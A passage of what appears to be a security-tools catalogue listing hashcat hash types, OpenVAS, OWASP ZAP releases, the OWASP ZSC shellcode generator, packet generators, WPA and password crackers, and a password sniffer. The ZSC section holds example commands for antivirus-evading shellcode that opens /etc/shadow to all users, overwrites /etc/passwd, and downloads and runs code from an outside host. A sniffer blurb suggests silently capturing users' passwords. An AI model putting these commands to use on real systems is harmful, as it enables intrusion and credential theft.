  • PBKDF2-HMAC-SHA512
  • MyBB
  • phpBB3
  • SMF
  • vBulletin
  • IPB
  • Woltlab Burning Board
  • osCommerce
  • xt:Commerce
  • PrestaShop
  • Mediawiki B type
  • Wordpress
  • Drupal
  • Joomla
  • PHPS
  • Django (SHA-1)
  • Django (PBKDF2-SHA256)
  • EPiServer
  • ColdFusion 10+
  • Apache MD5-APR
  • MySQL
  • PostgreSQL
  • MSSQL
  • Oracle H: Type (Oracle 7+)
  • Oracle S: Type (Oracle 11+)
  • Oracle T: Type (Oracle 12+)
  • Sybase
  • hMailServer
  • DNSSEC (NSEC3)
  • IKE-PSK
  • IPMI2 RAKP
  • iSCSI CHAP
  • Cram MD5
  • MySQL Challenge-Response Authentication (SHA1)
  • PostgreSQL Challenge-Response Authentication (MD5)
  • SIP Digest Authentication (MD5)
  • WPA
  • WPA2
  • NetNTLMv1
  • NetNTLMv1 + ESS
  • NetNTLMv2
  • Kerberos 5 AS-REQ Pre-Auth etype 23
  • Netscape LDAP SHA/SSHA
  • LM
  • NTLM
  • Domain Cached Credentials (DCC), MS Cache
  • Domain Cached Credentials 2 (DCC2), MS Cache 2
  • MS-AzureSync PBKDF2-HMAC-SHA256
  • descrypt
  • bsdicrypt
  • md5crypt
  • sha256crypt
  • sha512crypt
  • bcrypt
  • scrypt
  • OSX v10.4
  • OSX v10.5
  • OSX v10.6
  • OSX v10.7
  • OSX v10.8
  • OSX v10.9
  • OSX v10.10
  • AIX {smd5}
  • AIX {ssha1}
  • AIX {ssha256}
  • AIX {ssha512}
  • Cisco-ASA
  • Cisco-PIX
  • Cisco-IOS
  • Cisco $8$
  • Cisco $9$
  • Juniper IVE
  • Juniper Netscreen/SSG (ScreenOS)
  • Android PIN
  • GRUB 2
  • CRC32
  • RACF
  • Radmin2
  • Redmine
  • Citrix Netscaler
  • SAP CODVN B (BCODE)
  • SAP CODVN F/G (PASSCODE)
  • SAP CODVN H (PWDSALTEDHASH) iSSHA-1
  • PeopleSoft
  • Skype
  • 7-Zip
  • RAR3-hp
  • PDF 1.1 - 1.3 (Acrobat 2 - 4)
  • PDF 1.4 - 1.6 (Acrobat 5 - 8)
  • PDF 1.7 Level 3 (Acrobat 9)
  • PDF 1.7 Level 8 (Acrobat 10 - 11)
  • MS Office <= 2003 MD5
  • MS Office <= 2003 SHA1
  • MS Office 2007
  • MS Office 2010
  • MS Office 2013
  • Lotus Notes/Domino 5
  • Lotus Notes/Domino 6
  • Lotus Notes/Domino 8
  • Bitcoin/Litecoin wallet.dat
  • Blockchain, My Wallet
  • 1Password, agilekeychain
  • 1Password, cloudkeychain
  • Lastpass
  • Password Safe v2
  • Password Safe v3
  • eCryptfs
  • Android FDE <= 4.3
  • TrueCrypt 5.0+

Download oclHashcat v2.01

OpenVAS - The World's Most Advanced Open Source Vulnerability Scanner and Manager


The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools. The core of this SSL-secured service-oriented architecture is the OpenVAS Scanner. The scanner very efficiently executes the actual Network Vulnerability Tests (NVTs) which are served with daily updates via the OpenVAS NVT Feed or via a commercial feed service.


The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol (OMP). All intelligence is implemented in the Manager so that it is possible to implement various lean clients that will behave consistently e.g. with regard to filtering or sorting scan results. The Manager also controls a SQL database (sqlite-based) where all configuration and scan result data is centrally stored. Finally, Manager also handles user management includiung access control with groups and roles.


The OpenVAS protocols

Different OMP clients are available: The Greenbone Security Assistant (GSA) is a lean web service offering a user interface for web browsers. GSA uses XSL transformation stylesheet that converts OMP responses into HTML.


OpenVAS CLI contains the command line tool "omp" which allows to create batch processes to drive OpenVAS Manager. Another tool of this package is a Nagios plugin. 


Most of the tools listed above share functionality that is aggregated in the OpenVAS Libraries.

The OpenVAS Scanner offers the communication protocol OTP (OpenVAS Transfer Protocol) which allows to control the scan execution. This protocol is subject to be eventually replaced and thus it is not recommended to develop OTP clients.

Feature overview


  • OpenVAS Scanner
    • Many target hosts are scanned concurrently
    • OpenVAS Transfer Protocol (OTP)
    • SSL support for OTP (always)
    • WMI support (optional)
    • ...
  • OpenVAS Manager
    • OpenVAS Management Protocol (OMP)
    • SQL Database (sqlite) for configurations and scan results
    • SSL support for OMP (always)
    • Many concurrent scans tasks (many OpenVAS Scanners)
    • Notes management for scan results
    • False Positive management for scan results
    • Scheduled scans
    • Flexible escalators upon status of a scan task
    • Stop, Pause and Resume of scan tasks
    • Master-Slave Mode to control many instances from a central one
    • Reports Format Plugin Framework with various plugins for: XML, HTML, LateX, etc.
    • User Management
    • Feed status view
    • Feed synchronisation
    • ...
  • Greenbone Security Assistant (GSA)
    • Client for OMP and OAP
    • HTTP and HTTPS
    • Web server on its own (microhttpd), thus no extra web server required
    • Integrated online-help system
    • Multi-language support
    • ...
  • OpenVAS CLI
    • Client for OMP
    • Runs on Windows, Linux, etc.
    • Plugin for Nagios
    • ...


Download OpenVAS

OWASP ZAP 2.4.0 - Penetration Testing Tool for Testing Web Applications


ZAP is an OWASP Flagship project, and is currently the most active open source web application security tool.

For a quick introduction to the new release see this video:



Some of the most significant changes include:

‘Attack’ Mode

A new ‘attack’ mode has been added that means that applications that you have specified are in scope are actively scanned as they are discovered.

Advanced Fuzzing

A completely new fuzzing dialog has been introduced that allows multiple injection points to be attacked at the same time, as well as introducing new attack payloads including the option to use scripts for generating the payloads as well as pre and post attack manipulation and analysis.

Scan Policies

Scan policies define exactly which rules are run as part of an active scan.
They also define how these rules run influencing how many requests are made and how likely potential issues are to be flagged.
The new Scan Policy Manager dialog allows you to create, import and export as many scan policies as you need. You select any scan policy when you start an active scan and also specify the one used by the new attack mode.
Scan policy dialog boxes allow sorting by any column, and include a quality column (indicating if individual scanners are Release, Beta, or Alpha quality).

Scan Dialogs with Advanced Options

New Active Scan and Spider dialogs have replaced the increasing number of right click 'Attack' options. These provide easy access to all of the most common options and optionally a wide range of advanced options.

Hiding Unused Tabs

By default only the essential tabs are now shown when ZAP starts up.
The remaining tabs are revealed when they are used (e.g. for the spider and active scanner) or when you display them via the special tab on the far right of each window with the green '+' icon. This special tab disappears if there are no hidden tabs.
Tabs can be closed via a small 'x' icon which is shown when the tab is selected.
Tabs can also be 'pinned' using a small 'pin' icon that is also shown when the tab is selected - pinned tabs will be shown when ZAP next starts up.

New Add-ons

Two significant new ‘alpha’ quality add-ons are available:
  • Access Control Testing: adds the ability to automate many aspects of access control testing.
  • Sequence Scanning: adds the ability to scan 'sequences' of web pages, in other words pages that must be visited in a strict order in order to work correctly.
These can both be downloaded from the ZAP Marketplace.

New Scan Rules

A number of significant new ‘alpha’ quality scanners are available:
  • Relative Path Confusion: Allows ZAP to scan for issues that may result in XSS, by detecting if the browser can be fooled into interpreting HTML as CSS.
  • Proxy Disclosure: Allows ZAP to detect forward and reverse proxies between the ZAP instance and the origin web server / application server.
  • Storability / Cacheability: Allows ZAP to passively determine whether a page is storable by a shared cache, and whether it can be served from that cache in response to a similar request. This is useful from both a privacy and application performance perspective. The scanner follows RFC 7234.
Support has also been added for Direct Web Remoting as an input vector for all scan rules.

Changed Scan Rules

  • External Redirect: This plugin’s ID has been changed from 30000 to 20019, in order to more closely align with the established groupings. (This change may be of importance to **API Users**). Additionally some minor changes have been implemented to prevent collisions between injected values and in-page content, and improve performance. (Issues: 1529 and 1569)
  • Session ID in URL Rewrite: This plugin has been updated with a minimum length check for the value of the parameters it looks for. A false positive condition was raised related to this plugin (Issue 1396) whereby sID=5 would trigger a finding. Minimum length for session IDs as this plugin interprets them is now eight (8) characters.
  • Client Browser Cache: The active scan rule TestClientBrowserCache has been removed. Checks performed by the passive scan rule CacheControlScanner have been slightly modified. (Issue 1499)

More User Interface Changes

  • The ZAP splash screen is back: It now includes new graphics, a tips & tricks module, and loading/progress info.
  • The active scan dialog show the real plugin’s progress status based on the number of nodes that need to be scanned.
  • There is a new session persistence options dialog that prompts the user for their preferred settings at startup (you can choose to “Remember” the option and not be asked again).
  • For all Alerts the Risk field (False Positive, Suspicious, Warning) has been replaced with a more appropriately defined Confidence field (False Positive, Low, Medium, High, or Confirmed).
  • Timestamps are now optionally available for the output tab.

Extended API Support

The API now supports the spidering and active scanning or multiple targets concurrently, the management of scan policies as well as even more of the ZAP functionality.

Internationalized Help Add-ons

The help files are internationalized via https://crowdin.net/project/owasp-zap-help.
If you use ZAP in one of the many languages we support, then look on the ZAP Marketplace to see if the help files for that language are available. These will include all of the available translations for that language while defaulting back to English for phrases that have not yet been translated.

Release Notes

See the Release Notes (https://code.google.com/p/zaproxy/wiki/HelpReleases2_4_0) for a full list of all of the changes included in this release.


Download ZAP 2.4.0

OWASP ZAP 2.4.1 - Penetration Testing Tool for Testing Web Applications


The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.

Release 2.4.1

This release includes important security fixes - users are urged to upgrade asap.

One of the changes means that an API key is created by default, which means that any applications using the ZAP API will fail unless they are updated to use that key. The API Key can be found in the API Options screen You can also set it from the command line using an option like:
-config api.key=change-me-9203935709
For more details see https://github.com/zaproxy/zaproxy/wiki/FAQapikey
The following changes were made in this release:

Enhancements:
  • Issue 321 : Support multiple databases
  • Issue 1459 : Add an HTTP sender listener script
  • Issue 1500 : Update Bouncy Castle libs
  • Issue 1566 : Improve active scan's reported progress
  • Issue 1573 : Add option to inject plugin ID in header for all ascan requests
  • Issue 1607 : Unable to save the test session via API
  • Issue 1621 : AScan API - Allow to scan as an user
  • Issue 1625 : Support multiple structural params and ones on top level nodes
  • Issue 1653 : Support context menu key for trees
  • Issue 1655 : Copy Session Token from Http Sessions tab to clipboard
  • Issue 1662 : Add default Rails anti-CSRF token parameter
  • Issue 1664 : Clients tab autoscroll
  • Issue 1684 : Unable to set technology via API
  • Issue 1688 : Updating owasp/zap2docker image with Python Client API
  • Issue 1690 : Bump key pair size to 2048 for all certs in the (proxy's) chain of trust
  • Issue 1695 : Change SSL cert signature algorithm to "SHA-256 with RSA Encryption"
  • Issue 1699 : Allow ApiImplementor's to add custom headers
  • Issue 1715 : Unable to pass arguments when launching ZAP from the command line on Mac OS X
  • Issue 1728 : Update JRE to 1.7u79 (CPU) for MacOS

Bug fixes:
  • Issue 444 : Guaranteed NPE on AliasCertificate.getName() if getCN()==null
  • Issue 1442 : Up/Down arrow keys in results stop working if "reflected"
  • Issue 1473 : Spider does not handle URLs extracted from meta tags correctly
  • Issue 1497 : The spider is extracting and reporting links from comments - event when instructed not to do so
  • Issue 1598 : startup script lacks support for FreeBSD
  • Issue 1615 : Search "All" option not working
  • Issue 1617 : ZAP 2.4.0 throws HeadlessExceptions when running in daemon mode on headless machine
  • Issue 1618 : Target Technology Not Honored
  • Issue 1619 : Search regex might not be validated
  • Issue 1624 : Error while loading ZAP 2.4.0
  • Issue 1626 : Structural parameters not saved when context exported and not available via the API
  • Issue 1636 : Users (for auth) & Forced User not loaded from session
  • Issue 1647 : Wrong reference in Zest Result
  • Issue 1674 : Ajax spider not considering get parameters
  • Issue 1677 : Fuzzers can't be expanded on OS X
  • Issue 1694 : "Error: setting file is missing. Program will exit." even if file exists
  • Issue 1698 : Escape API exceptions
  • Issue 1700 : Forced Browse Lists Missing from Drop-Down in 2.4.0
  • Issue 1706 : Add API security options
  • Issue 1708 : Context's technology tree can get out of sync
  • Issue 1709 : Applications are not (immediately) shown after start
  • Issue 1714 : PNH should not reflect API key unless user supplies it
  • Issue 1716 : Restrict use of CORS header in pnh
  • Issue 1720 : Add more security options for JSONP API
  • Issue 1724 : Ensure API component names are escaped in the HTML output
  • Issue 1735 : Context's technologies not used in active scan unless overridden

OWASP ZSC Shellcoder - Generate Customized Shellcodes



OWASP ZSC is an open source software in python language which lets you generate customized shellcodes for listed operation systems. This software can be run on Windows/Linux&Unix/OSX and others OS under python 2.7.x.

Description

Usage of shellcodes

Shellcodesare small codes in assembly which could be use as the payload in software exploiting. Other usages are in malwares, bypassing antiviruses, obfuscated codes and etc.

Why use OWASP ZSC ?

According to other shellcode generators same as metasploit tools and etc, OWASP ZSC using new encodes and methods which antiviruses won't detect. OWASP ZSC encoderes are able to generate shellcodes with random encodes and that's lets you to get thousands new dynamic shellcodes with same job in just a second,that means you will not get a same code if you use random encodes with same commands, And that make OWASP ZSC one of the bests! otherwise it's gonna generate shellcodes for many operation systems in next versions.

Help Menu
Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist   => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-wizard => wizard mod

-update => check for update
-about => about software and developers.
With these switch you can see the oslist,encode types and functions [joblist] to generate your shellcode.
OS List "-oslist"
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64
Encode Types "-types"
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all
Functions "-joblist"
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Now you are able to choose your operation system, function, and encode to generate your shellcode, But all of these features are not activated yet, so you have to look up this table HERE to see what features are activated.


For example, this part of table telling us all functions for linux_x86 is activated, But Encodes [xor_random, xor_yourvalue, add_random, add_yourvalue, sub_random, sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant] are just activated for chmod() function.

Examples
>zsc -os linux_x86 -encode inc -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello2.txt','hello[space]world[space]!')" -o file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('script.type','D:\\myfile.type','./script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')" -o file.txt
Note: Don’t use space ‘ ’ in system() function, replace it with “[space]” , software will detect and replace “ ” for you in shellcode.
Note: script_executor(),download_execute(),download(),dir_create(),file_create() are using linux command line , not the function. [wget,mkdir,echo] system() function added in script, you can use it to do anything and generate any command line shellcode.
Note: exec() doesn’t support any ARGV same as exec(‘/bin/bash -c ls’) or exec(‘/bin/bash’,‘-c’,‘ls’), you have to wait for next version and this feature will available in system()
Note: you also can use high value for inc and dec time, like inc_100000, your shellcode may get too big
Note: each time you execute chmod()[or any other] function with random encode, you are gonna get random outputs and different shellcode.
Note: your xor value could be anything. “xor_0x41414141” and “xor_0x45872f4d” are examples.

Wizard Switch

With -wizard switch you are able to generate shellcode without long ARGVs, software will ask you for information.

Note: While you are using -wizard switch, if you push “Enter” without typing anything, the default value will be set on the varible.
Note: With entering “list”, List of values will be shown.

Available Features
  • add length calculator for output
  • add filename writer in gcc commandline in output file
  • fixed bug in encoding module not available.
  • fixed bug in os module not available
  • add “-wizard” switch
  • add installer “use ‘zsc’ commandline in terminal after installed”
  • add uninstaller
  • This Software just could be run on linux since this version
  • change output to .c file and automated shellcode generating
  • add color output for termina
  • add inc encoding chmod() [linux_x86]
  • add inc_timesyouwant chmod() [linux_x86]
  • add dec encoding chmod() [linux_x86]
  • add dec_timesyouwant chmod() [linux_x86]
  • add features table inside “features_table.html”
  • add -about to menu for developers name and etc
  • fixed permission number calculating in chmod() [linux_x86]
  • software’s signature changes
  • bug fix reported by user in executing on linux , color function
  • add xor_random encoding chmod() [linux_x86]
  • add xor_yourvalue encoding chmod() [linux_x86]
  • add add_random encoding chmod() [linux_x86]
  • add add_yourvalue encoding chmod() [linux_x86]
  • add sub_random encoding chmod() [linux_x86]
  • add sub_yourvalue encoding chmod() [linux_x86]
  • fixed shellcode encode type checking
  • [linux_x86 modules completed]
  • add script_executor() [linux - using command execution]
  • add download_execute() [linux_x86 - using command execution (wget)]
  • add download() [linux_x86 - using command execution (wget)]
  • add dir_create() [linux_x86 using command execution]
  • add file_create() [linux_x86 using command execution]
  • add encodes file for next version released
  • add system() [linux_x86 command execute]
  • fixed chmod filename ¼ char length [linux_x86]
  • fixed exec filename ¼ char length [linux_x86]
  • fixed write filename ¼ length [linux_x86]
  • fixed write content ¼ length [linux_x86]
  • fixed write length calculator [linux_x86]
  • and fixed some other bugs in coding [core]
  • system() function added in script, you can use it to do anything and generate any command line shellcode.
  • add chmod() [linux_x86] -> chmod(‘/path/file’,‘perm_num’)
  • add write() [linux_x86] -> write(‘/path/file’,‘content’)
  • add exec() [linux_x86] -> exec(‘/path/file’)
  • add encode [none - all os]
  • add mix_all encoding in chmod() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in file_create() [linux_x86]
  • add xor_yourvalue encoding in file_create() [linux_x86]
  • add add_random encoding in file_create() [linux_x86]
  • add add_yourvalue encoding in file_create() [linux_x86]
  • add sub_random encoding in file_create() [linux_x86
  • add sub_yourvalue encoding in file_create() [linux_x86]
  • add inc encoding in file_create() [linux_x86]
  • add inc_timesyouwant encoding in file_create() [linux_x86
  • add dec encoding in file_create() [linux_x86]
  • add dec_timesyouwant encoding in file_create() [linux_x86]
  • add mix_all encoding in file_create() [linux_x86]
  • add xor_random encoding in dir_create() [linux_x86]
  • add xor_yourvalue encoding in dir_create() [linux_x86]
  • add add_random encoding in dir_create() [linux_x86]
  • add add_yourvalue encoding in dir_create() [linux_x86]
  • add sub_random encoding in dir_create() [linux_x86
  • add sub_yourvalue encoding in dir_create() [linux_x86]
  • add inc encoding in dir_create() [linux_x86]
  • add inc_timesyouwant encoding in dir_create() [linux_x86
  • add dec encoding in dir_create() [linux_x86]
  • add dec_timesyouwant encoding in dir_create() [linux_x86]
  • add mix_all encoding in dir_create() [linux_x86]
  • add xor_random encoding in download() [linux_x86]
  • add xor_yourvalue encoding in download() [linux_x86]
  • add add_random encoding in download() [linux_x86]
  • add add_yourvalue encoding in download() [linux_x86]
  • add sub_random encoding in download() [linux_x86
  • add sub_yourvalue encoding in download() [linux_x86]
  • add inc encoding in download() [linux_x86]
  • add inc_timesyouwant encoding in download() [linux_x86
  • add dec encoding in download() [linux_x86]
  • add dec_timesyouwant encoding in download() [linux_x86]
  • add mix_all encoding in download() [linux_x86]
  • add xor_random encoding in download_execute() [linux_x86]
  • add xor_yourvalue encoding in download_execute() [linux_x86]
  • add add_random encoding in download_execute() [linux_x86]
  • add add_yourvalue encoding in download_execute() [linux_x86]
  • add sub_random encoding in download_execute() [linux_x86
  • add sub_yourvalue encoding in download_execute() [linux_x86]
  • add inc encoding in download_execute() [linux_x86]
  • add inc_timesyouwant encoding in download_execute() [linux_x86
  • add dec encoding in download_execute() [linux_x86]
  • add dec_timesyouwant encoding in download_execute() [linux_x86]
  • add mix_all encoding in download_execute() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in script_executor() [linux_x86]
  • add xor_yourvalue encoding in script_executor() [linux_x86]
  • add add_random encoding in script_executor() [linux_x86]
  • add add_yourvalue encoding in script_executor() [linux_x86]
  • add sub_random encoding in script_executor() [linux_x86
  • add sub_yourvalue encoding in script_executor() [linux_x86]
  • add inc encoding in script_executor() [linux_x86]
  • add inc_timesyouwant encoding in script_executor() [linux_x86
  • add dec encoding in script_executor() [linux_x86]
  • add dec_timesyouwant encoding in script_executor() [linux_x86]
  • add mix_all encoding in script_executor() [linux_x86]
  • add add_random encoding in write() [linux_x86]
  • add xor_random encoding in write() [linux_x86]
  • add sub_random encoding in write() [linux_x86]
  • add xor_random encoding in exec() [linux_x86]
  • add sub_random encoding in exec() [linux_x86
  • add add_random encoding in exec() [linux_x86]
  • fixed bug in system() when len(command) is less than 5
  • fixed bug in encode module add_random chmod() [linux_x86] 

Packet Sender - The UDP and TCP Network Test Utility


Packet Sender is an open source utility to allow sending and receiving TCP and UDP packets. It is available free (no ads / no bundleware) for Windows, Mac, and Linux. It can be used for both commercial and personal use (license). It's designed to be very easy to use while still providing enough features for power users to do what they need.

Mobile 

The native mobile versions have been abandoned to focus on the more popular and more capable desktop version. However, the GitHub projects for both iOS and Android are MIT Licensed and available for forking.



Change log
  • Version 2015-04-19
    • Portable mode
    • Read in file from command line
    • Save traffic log
    • Mobile versions have been abandoned. Project focus is now on the far more popular desktop version.
  • Version 2015-02-13
    • Migrated to GitHub
    • New vector-based logo
    • Bug fix in quick-disable/enable
    • Migrated to Qt 5.4
    • Ubuntu version brought up to date.
    • Forums are closed (spammers killed it).
  • Version 2014-10-07
    • Initial launch of forums.
    • Multi-Send.
    • Quick-send from traffic log selected packets.
    • Packet Export/Import.
    • Rolling traffic log support.
    • Numerous configuration settings added:
      • Copy raw packet data to clipboard.
      • Receive before send.
      • Connection delays for slow devices.
    • Command line interface default binds to 0.
    • Universal (XP through 8.1) Windows installer.
    • Migrated to Qt 5.3
    • Some rework of the "About" section.
  • Version 2014-02-22
    • TCP connections are now fully threaded (no more UI freezes).
    • Brand new and highly capable command line interface. (Run PacketSender --help)
    • Some mild UI enhancements to make sending easier.
    • Ubuntu version brought up to date.
    • Windows XP now separated.
    • Qt 5.2
  • Version 1.5 (Mobile)
    • Android version released.
  • Version 2013-11-18
    • Copy to Clipboard button on traffic log.
    • Name prompt for traffic log.
  • Version 2013-11-11
    • Bad installer on Windows. No other changes made.
  • Version 2013-11-09
    • Searching packets from traffic log.
    • Fixed some traffic log stability problems.
  • Version 2013-11-05
    • Added resending packets at user-specified intervals.
    • Traffic log sped up significantly.
    • Packet searching.
    • Table headers (both saved packets and traffic log) can be rearranged.
    • Response packet for TCP actually works now.
    • Response packet data can be manually updated.
    • About / License stuff moved to another tab.
    • Internal libraries updated.
  • Version 2013-10-20
    • 64-bit Ubuntu and Linux Mint support.
  • Version 2013-10-14
    • Ubuntu and Linux Mint support.
  • Version 2013-05-20
    • Saving is less quirky.
    • Domain names can be used in IP address line. Packet Sender will do a quick lookup to find the IP.
    • Internal libraries updated.
  • Version 2012-09-12
    • Public release of deskop version.

Download Packet Sender

PackETH - Ethernet Packet Generator


PackETH is GUI and CLI packet generator tool for ethernet. It allows you to create and send any possible packet or sequence of packets on the ethernet link. It is very simple to use, powerful and supports many adjustments of parameters while sending sequence of packets. And lastly, it has the most beautiful web site of all the packet generators.

Features
  • you can create and send any ethernet packet. Supported protocols:
    • ethernet II, ethernet 802.3, 802.1q, QinQ, user defined ethernet frame
    • ARP, IPv4, IPv6, user defined network layer payload
    • UDP, TCP, ICMP, ICMPv6, IGMP, user defined transport layer payload
    • RTP (payload with options to send sin wave of any frequency for G.711)
    • JUMBO frames (if network driver supports it)
  • sending sequence of packets
    • delay between packets, number of packets to send
    • sending with max speed, approaching the theoretical boundary
    • change parameters while sending (change IP & mac address, UDP payload, 2 user defined bytes, etc.)
  • saving configuration to a file and load from it - pcap format supported


Download PackETH

Passgen - Random Character Generator Crunch to Crack WPA/WPA2


Passgen is an alternative for the random character generator crunch which attempts to solve cracking WPA/WPA2 keys by randomizing the output opposed to generating a list like so, (aaaaaaaa, aaaaaaab, aaaaaac, etc).

Example usuage with aircrack-ng
python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w- WiFi.cap)

Argument switches are as followed:
-l lowercase ascii
-l1 lowercase ascii + digits(0-9)
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length


Download Passgen

Password Cracking Suite


How To Use It:

Dics Path:
In this path, you can add any dictionary you would like to use.

Tools Path:
In this path, the script will install 3rd party tools. You can download some here:
http://www.moehre.org/bruteforce.html
http://cyberwarzone.com/cyberwarfare/password-cracking-mega-collection-password-cracking-word-lists
http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html

Tools used by the script:

Availible Hash Types:
afs bf bfegg bsdi crc32 crypt
des django dmd5 dominosec dragonfly3-32 dragonfly3-64
dragonfly4-32 dragonfly4-64 drupal7 dummy dynamic_n
epi episerver gost hdaa hmac-md5 hmac-sha1
hmac-sha224 hmac-sha256 hmac-sha384 hmac-sha512
hmailserver ipb2 keepass keychain krb4 krb5 lm lotus5
md4-gen md5 md5ns mediawiki mscash mscash2 mschapv2
mskrb5 mssql mssql05 mysql mysql-sha1 nethalflm netlm
netlmv2 netntlm netntlmv2 nsldap nt nt2 odf office
oracle oracle11 osc pdf phpass phps pix-md5 pkzip po
pwsafe racf rar raw-md4 raw-md5 raw-md5u raw-sha
raw-sha1 raw-sha1-linkedin raw-sha1-ng raw-sha224
raw-sha256 raw-sha384 raw-sha512 salted-sha1 sapb
sapg sha1-gen sha256crypt sha512crypt sip ssh
sybasease trip vnc wbb3 wpapsk xsha xsha512 zip


Download Password Cracking Suite

Password Sniffer Console - Command-line Tool to Sniff and Capture HTTP/FTP/POP3/SMTP/IMAP Passwords


Password Sniffer Console is the all-in-one command-line based Password Sniffing Tool to capture Email, Web and FTP login passwords passing through the network.

It automatically detects the login packets on network for various protocols and instantly decodes the passwords.

Here is the list of supported protocols,
  • HTTP (BASIC authentication)
  • FTP
  • POP3
  • IMAP
  • SMTP

In addition to recovering your own lost passwords, you can use this tool in following scenarios,
  • Run it on Gateway System where all of your network's traffic pass through.
  • In MITM Attack, run it on middle system to capture the Passwords from target system.
  • On Multi-user System, run it under Administrator account to silently capture passwords for all the users.

It includes Installer which installs the Winpcap, network capture driver required for sniffing. For Windows 8, first you have to manually install Winpcap driver (in Windows 7 Compatibility mode) and then run our installer to install only Password Sniffer Console.

It is a very useful tool for penetration testers and being a command-line tool makes it suitable for automation.

It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Requirements
PasswordSnifferConsole requires Winpcap (http://www.winpcap.org) - industry standard packet capture library for Windows. By default latest version of Winpcap (as of this writing v4.1.2) is installed automatically during the installation of Password Sniffer Console.

